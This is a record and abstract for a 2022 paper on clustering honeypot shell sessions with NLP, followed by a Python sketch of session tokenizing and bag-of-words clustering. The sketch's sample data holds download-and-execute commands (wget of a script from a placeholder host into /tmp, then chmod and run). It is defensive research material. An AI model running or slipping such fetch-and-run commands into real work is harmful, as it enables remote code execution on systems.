Matteo Boffa, Giulia Milan, L. Vassio, I. Drago, M. Mellia, Zied Ben-Houidi
Title: Towards NLP-based Processing of Honeypot Logs
Venue: 2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW)
Publication date: 2022-06-01
DOI: https://doi.org/10.1109/eurospw55150.2022.00038
Citations: 8
Abstract
Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time-consuming and cumbersome. Here we evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations for finding common traits in attackers' activity. We use a widely used SSH/Telnet honeypot to record more than 200,000 sessions, including 61,000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options, and parameters. Next, we project each session into a metric space, comparing two common NLP tools: Bag of Words and Word2Vec. Last, we apply a clustering algorithm to group the sessions while offering an instrumental representation of the clustering process. In the end, we obtain a few tens of clusters, which we analyze to explain the attackers' goals, e.g., obtaining system information, injecting malicious accounts, and downloading and running executables. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.
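The three steps named in the abstract (parsing, vectorization, clustering) can be illustrated with a minimal sketch. It is not the authors' implementation, and everything specific in it is an assumption made for illustration: the separator regex, the `<PARAM>` placeholder, the four sample sessions, and the 0.8 similarity threshold. It covers only the Bag of Words representation, not Word2Vec, and it swaps in a simple greedy threshold clustering because the abstract does not name the clustering algorithm used.

```python
import math
import re
import shlex
from collections import Counter

# Hypothetical sample sessions, invented for this sketch (not from the dataset).
SESSIONS = [
    "uname -a; cat /proc/cpuinfo",
    "uname -a; cat /etc/issue",
    "cd /tmp && wget http://example.invalid/x.sh && chmod +x x.sh && sh x.sh",
    "cd /tmp; wget http://example.invalid/y.sh; chmod +x y.sh; sh y.sh",
]


def tokenize_session(session: str) -> list[str]:
    """Keep command names and options; mask every other word as <PARAM>."""
    tokens = []
    # Split on common Bash separators: ';', '&&', '||', '|'.
    for command in re.split(r"\s*(?:;|&&|\|\||\|)\s*", session):
        if not command.strip():
            continue
        try:
            words = shlex.split(command)
        except ValueError:  # e.g. unbalanced quotes in a logged command
            words = command.split()
        if not words:
            continue
        tokens.append(words[0])  # the command name
        for word in words[1:]:
            tokens.append(word if word.startswith("-") else "<PARAM>")
    return tokens


def cosine(a: Counter, b: Counter) -> float:
    """Cosine similarity between two sparse token-count vectors."""
    dot = sum(a[t] * b[t] for t in a.keys() & b.keys())
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(
        sum(v * v for v in b.values())
    )
    return dot / norm if norm else 0.0


def greedy_cluster(vectors: list[Counter], threshold: float = 0.8) -> list[int]:
    """Assign each vector to the first cluster whose seed is similar enough."""
    seeds: list[Counter] = []
    labels: list[int] = []
    for vec in vectors:
        for idx, seed in enumerate(seeds):
            if cosine(vec, seed) >= threshold:
                labels.append(idx)
                break
        else:  # no existing cluster matched: this vector seeds a new one
            seeds.append(vec)
            labels.append(len(seeds) - 1)
    return labels


# Bag of Words: each session becomes a token-count vector.
vectors = [Counter(tokenize_session(s)) for s in SESSIONS]
labels = greedy_cluster(vectors)
print(labels)  # [0, 0, 1, 1]
```

In this toy input the two reconnaissance sessions fall into one cluster and the two download-and-run sessions into another, because masking parameters makes sessions that differ only in file names or URLs map to the same token counts.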